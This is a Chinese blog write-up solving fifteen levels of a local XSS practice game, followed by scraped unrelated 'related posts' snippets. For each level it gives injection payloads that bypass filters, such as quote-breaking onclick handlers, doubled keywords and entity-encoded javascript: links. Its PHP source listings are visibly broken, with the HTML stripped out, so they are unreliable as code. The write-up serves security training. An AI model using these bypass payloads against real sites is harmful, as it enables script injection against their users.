2. 程式人生 > >xss小遊戲原始碼分析

xss小遊戲原始碼分析

阿新 發佈:2020-07-16
## 配置 下載地址:[https://files.cnblogs.com/files/Lmg66/xssgame-master.zip](https://files.cnblogs.com/files/Lmg66/xssgame-master.zip) 使用:下載解壓,放到www目錄下(phpstudy),http服務下都行,我使用的是phpstudy ## 第一關 ### 檢視原始碼: ``` 第1關

第1關 先熱個身吧

歡迎使用者:".$str.""; ?>
payload的長度:".strlen($str).""; ?> ``` ### 分析: 對name沒有任何的過濾輸出到標籤中,基本的xss都行 ### payload: ``` level1.php?name= ``` ## 第二關 ### 檢視原始碼: ``` 第2關

第2關 窒息的操作

沒有找到和".htmlspecialchars($str)."相關的結果.".'
'; ?>
payload的長度:".strlen($str).""; ?> ``` ### 分析: 用htmlspecialchars()函式,之前做過,會html實體化,<>會被轉義 可以嘗試"來閉合" ### payload: ``` " onclick=alert('XSS') // " onclick=alert('XSS') " ``` ## 第三關 ### 檢視原始碼: ``` 第3關

第3關 這該咋辦啊

沒有找到和".htmlspecialchars($str)."相關的結果."."
"; ?>
payload的長度:".strlen($str).""; ?> ``` ### 分析: 和第二關類似,只是變成了單引號,閉合單引號即可 ### payload: ``` ' onclick=alert('xss') ' ' onclick=alert('xs') // ``` ## 第四關 ### 檢視原始碼: ``` 第4關

第4關 生無可戀

","",$str); $str3=str_replace("<","",$str2); echo "

沒有找到和".htmlspecialchars($str)."相關的結果.

".'
'; ?>
payload的長度:".strlen($str3).""; ?> ``` ### 分析: 在第二關的基礎上進行了< >的過濾,但第二關payload沒有 < >仍然可以使用 ### payload: ``` " onclick=alert('XSS') // " onclick=alert('XSS') " ``` ## 第五關 ### 檢視原始碼: ``` 第5關

第5關 沒錯又是搜尋

第6關

第6關 嗯 還是搜尋

第7關

第7關 猜一猜下面題目還有搜尋嘛

沒有找到和".htmlspecialchars($str)."相關的結果.".'
'; ?>
payload的長度:".strlen($str6).""; ?> ``` ### 分析: get方式傳入keyword,strtolowe()函式變為小寫,然後replace()函式匹配script,on,src,data,href,但是隻是匹配了一次,所以可以巢狀繞過,最後htmlspecialchars(),所以< > 不能用,嘗試閉合" ### payload: ``` " oonnclick=alert('XSS') // ``` ## 第八關 ### 檢視原始碼: ``` 第8關

第8關 老鐵要和我換友鏈嘛?

'; ?>
友情連結'; ?>
payload的長度:".strlen($str7).""; ?> ``` ### 分析: get方式傳入keyword,strtolower()轉換為小寫,然後replace替換script,on,src,data,href,"("號html實體化了),然後發現又html實體化輸入,似乎沒有問題,然後發現友情連結,沒有html實體化輸入,可以嘗試在這個位置繞過,但是都被過濾了,嘗試編碼繞過對JavaScript;alert('xss')編碼(呸,不是編碼)轉義https://www.jianshu.com/p/6dcefb2a59b2(參考連結),目的是繞過replace,然後仍能被html解析 ![](https://img2020.cnblogs.com/blog/2092671/202007/2092671-20200716153156440-669296304.png) ### payload: ``` javascript:alert('xss') javascrip t:alert('XSS') ``` ## 第九關 ### 檢視原始碼: ``` 第9關

第9關 新增友連again

'; ?>
友情連結'; } else { echo '

友情連結
'; } ?>
payload的長度:".strlen($str7).""; ?> ``` ### 分析: 和第八關相同,只是判斷連結是否合法,加上http://就可以了 ### payload: ``` javascript:alert('xss') //http:// ``` ## 第十關 ### 檢視原始碼: ``` 第10關

第10關 嗯 搜尋又出現了

","",$str11); $str33=str_replace("<","",$str22); echo "

沒有找到和".htmlspecialchars($str)."相關的結果.

".'
'; ?>
payload的長度:".strlen($str).""; ?> ``` ### 分析: 傳入keyword和t_sort,keyword沒有過濾,但是html實體化輸出,而且沒在標籤內,所以應該沒問題,看t_sort,過濾了< > ,而且沒有實體化輸出 嘗試閉合引號 ### payload: ```?keyword=123&t_sort=" type="text" onclick=alert('XSS') //``` ## 第十一關 ### 檢視原始碼: ``` 第11關

第11關 為什麼這麼多搜尋呢

","",$str11); $str33=str_replace("<","",$str22); echo "

沒有找到和".htmlspecialchars($str)."相關的結果.

".'
'; ?>
payload的長度:".strlen($str).""; ?> ``` ### 分析: str和str00都html實體化而且不在script標籤內部,且閉合為',應該無解,然後發現str33,沒有實體化,$_SERVER['HTTP_REFERER']獲取httpreferer資訊,只是過濾了< > ,可以閉合雙引號來繞過,不過我沒明白這題啥用 ### payload: ```" type = "text" onclick=alert('xss')//``` ![](https://img2020.cnblogs.com/blog/2092671/202007/2092671-20200716155135936-947804950.png) ## 第十二關 ### 檢視原始碼: ``` 第12關

第12關 黑人問號

","",$str11); $str33=str_replace("<","",$str22); echo "

沒有找到和".htmlspecialchars($str)."相關的結果.

".'
'; ?>
payload的長度:".strlen($str).""; ?> ``` ### 分析: 和上一關一樣,xss位置變一下 ### payload: ```" type = "text" onclick=alert('xss')//``` ![](https://img2020.cnblogs.com/blog/2092671/202007/2092671-20200716155150206-207638672.png) ## 第十三關 ### 檢視原始碼: ``` 第13關

第13關 做題好爽啊

","",$str11); $str33=str_replace("<","",$str22); echo "

沒有找到和".htmlspecialchars($str)."相關的結果.

".'
'; ?>
payload的長度:".strlen($str).""; ?> ``` ### 分析: $_COOKIE["user"];獲取cookie,然後過濾< > 沒有實體化輸入,嘗試閉合雙引號 ### payload: ``` user=" type = "text" onclick=alert('xss')// ``` ![](https://img2020.cnblogs.com/blog/2092671/202007/2092671-20200716155202526-1653948031.png) ## 第十四關 ### 檢視原始碼: ``` 第14關

第14關 恭喜你快要通關了

'; ?> ``` ### 分析: 傳入src,然後實體化輸出,然後似乎無解,仔細看前面ng-include:, ng-include 指令用於包含外部的 HTML 檔案。包含的內容將作為指定元素的子節點。ng-include 屬性的值可以是一個表示式,返回一個檔名。預設情況下,包含的檔案需要包含在同一個域名下。所以傳入其他關的xss,不過不知道這有啥用既然其他地點有xss ![](https://img2020.cnblogs.com/blog/2092671/202007/2092671-20200716153858013-2105947117.png) ### payload: ``` src='level1.php?name= ' ``` 由於引用的js程式碼失敗,所以我沒成功,但云靶機是對的,雲靶機地址:https://www.xss.tv/ ![](https://img2020.cnblogs.com/blog/2092671/202007/2092671-20200716153943472-228248997.png) ## 第十五關 ### 檢視原始碼: ``` 第15關

第15關 厲害了 Word哥

".$str5.""; ?>
payload的長度:".strlen($str5).""; ?> ``` ### 分析: get傳入可以word,轉換為小寫,讓過濾script,空格,/,可以使用url編碼來繞過 | 符號 |url編碼 | | -------- | ------ | | 回車 | %0d | | 換行 | %0d | payload: ``` level15.php?keyword= ``` ## 參考文章 國光大佬:[https://www.sqlsec.com/2020/01/xss.html](https://www.sqlsec.com/2020/01/xss.html) 最後歡迎訪問我的部落格:[https://lmg66.github.io/](https://lmg66.gith

相關推薦

xss遊戲原始碼分析

## 配置 下載地址:[https://files.cnblogs.com/files/Lmg66/xssgame-master.zip](https://files.cnblogs.com/files/Lmg66/xssgame-master.zip) 使用:下載解壓,放到www目錄下(phpstudy),

谷歌XSS遊戲通關手記(完結)

0x00:Google XSS Game 玩樂地址:https://xss-game.appspot.com/ 谷歌知識庫:https://tools.ietf.org/html/draft-hoehrmann-javascript-scheme-00 Github地址:http

使用C語言實現隨機遊戲原始碼

#include"stdio.h" #include"stdlib.h" #include"windows.h" int print() {     printf("\n\n+++++++++++++你會看見的數字和運算子+++++++++++++\n");   &

XSS遊戲學習筆記(level 1-10)

XSS小遊戲 level 1 右鍵檢視頁面原始碼 <script> window.alert = function() { confirm("完成的不錯!"); window.location.href="level2.php?keyword

java swing實現簡單的中國象棋遊戲原始碼

大家好,今天給大家演示一下一款由Java swing實現的小遊戲中國象棋,這款中國象棋比較簡單,實現了主要的對弈功能,適合Java學習者和學生交作業,功能不是很複雜。下面來看看執行結果。 1. 將專案匯入到eclipse; 2. 正確匯入後即可執行,由於功能相對簡單,所以所

EasyX遊戲原始碼

EasyX外掛下載地址:www.easyx.cn,點選右上角下載 1.貪吃蛇 /////////////////////////////////// // 程式名稱:貪吃蛇 // 編譯環境:Visual C++ 6.0 / 2008,EasyX 2013冬至版 /

Java貪吃蛇遊戲原始碼系列之輔助類

圖片音樂類素材 連結:https://pan.baidu.com/s/1-RMnKVGlRSq3il0-Bsd3qg 提取碼:qa3w Java貪吃蛇小遊戲之音樂類 package snakeGame; /* * 設定程式執行背景音樂,包括 點選按鈕音樂,鼓勵音,撞牆音樂,吃食物

微信程式漏洞:可下載任意微信遊戲原始碼

本文轉載自【小專欄平臺】公眾號,由獨立開發者朱鵬飛投稿。如果大家想要微信跳一跳小遊戲以及其他十幾個小遊戲原始碼,大家可以關注【小專欄平臺】公眾號,回覆“微信小遊戲”即可獲取到。 截止原作者目前推送文章的時候( 2018年1月1日23:50分 ),微信官方已經修復了這個漏

jQuery網頁版五子棋遊戲原始碼下載

<!DOCTYPE html> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>jquery五子棋遊戲 -&

Java 2048 遊戲 原始碼

import java.awt.Color; import java.awt.EventQueue; //import java.awt.BorderLayout; //import java.awt.FlowLayout; import java.awt.Font; i

黑白棋遊戲原始碼分析

  遊戲規則: 在一個8x8的棋盤有兩個玩家,他們輪流放入分別放入白色和黑色的棋子。 當一個玩家在空棋子的位置放入一個棋子,我們檢查放入棋子的8個方向 上 下 左 右 左上 左下 右上 右下,如果這8個方向上有自己這方的棋子夾的全是對方的棋子,則對方的棋子將被吃掉,變成我

450多款H5遊戲原始碼之微信H5遊戲原始碼大集合持續更新中

今天把本博主近幾年來收集整理的近450多款H5小遊戲原始碼釋出出來,所有的原始碼都是我經過測試執行無誤的,以後我還會不定時更新的,因為原始碼是打包整合的,一個一個更新太煩,所以我都是一批一批的更新的,一段時間後我會把近期整理測試的一批原始碼更新上去,所以感興趣的可以持續關注,

學以致用——Java原始碼——騎士之旅(跳馬)遊戲_優化演算法加彙總分析版(Knight’s Tour - Heuristic plus statistics version)

接上一篇,學以致用——Java原始碼——騎士之旅(跳馬)小遊戲_優化演算法版(Knight’s Tour - Heuristic version), https://blog.csdn.net/hpdlzu80100/article/details/85330188。 本程式加入了統計分

橫屏遊戲--蘿莉快跑源代碼分析

mark 無限 分享 idt alt popu odr tracking dispatch 主角出場: 初始化主角 hero = new GameObjH

Android-貪吃蛇遊戲-分析與實現-Kotlin語言描述

otl bject vid oid 小遊戲 同時 們的 http 畫布 Android-貪吃蛇小遊戲-分析與實現-Kotlin語言描述 Overview 本章的主要的內容是貪吃蛇小遊戲的分析和實現,關於實現的具體代碼可以在,文章底部的github的鏈接中找到。 整個遊戲通過

XSS通關遊戲以及我的挑戰思路分享(XSS繞過程式碼)

level1 這一關是一個很簡單的測試,直接在url上改一下標籤就行了。 payload如下: 127.0.0.1/XSS/level1.php?name=<script>alert(1)</script> level2 這一關是一個比較典型的搜尋框XSS

Java實現貪吃蛇遊戲(附完整原始碼

今天我就從零開始來完成這個小遊戲,完成的方式也是一步一步的新增功能這樣的方式來實現。 第一步完成的功能:寫一個介面 大家見到的貪吃蛇小遊戲,介面肯定是少不了的。因此,第一步就是寫一個小介面。 實現程式碼如下: 第二步完成的功能:在介面上畫成一格一格的 我們見過的貪吃蛇遊戲

[原始碼分享]使用JAVA開發了一個雷霆戰機遊戲^_^

本程式使用Myeclipse開發,編碼為UTF-8。 本程式實現的主要功能有玩家飛機的控制、玩家飛機子彈發射、敵機移動、敵機子彈發射、boss飛機的折線運動、boss飛機的子彈發射、玩家飛機和boss飛機的血量顯示、遊戲的暫停開始及重新開始、控制遊戲音效的播放、玩家戰機的選擇(五種戰機)、飛

[原始碼分享]使用C#開發了一個RPG角色扮演類的遊戲^_^

角色扮演類遊戲(RPG),該遊戲實現的具體功能是設計兩種型別的人物,分別為被玩家所控制的玩家人物(Hero)和由系統所控制的外部人物(Enemy),遊戲中的主要情節就是Hero與 Enemy之間的戰鬥,雙方互相發射子彈擊打對方。 在遊戲的設計中要求遊戲具有良好的擴充套件性,遊戲介面友好,應方

[文件和原始碼分享] 基於WIN32 API介面程式設計實現的百戰天蟲遊戲

  在遊戲編寫的過程中,我一直在思考我自己製作的遊戲的主旨是什麼,想來想去,結合“百戰天蟲”遊戲的特點,我想到了“戰爭”這個主旨。遊戲中陣營的相互廝殺不正如國家之間的戰爭嗎?於是,我希望通過這款遊戲反映我對戰爭的一些思考。在遊戲結束或者暫停的時候,沒有顯示勝利者,因為我覺得戰爭沒有贏家,而在螢幕上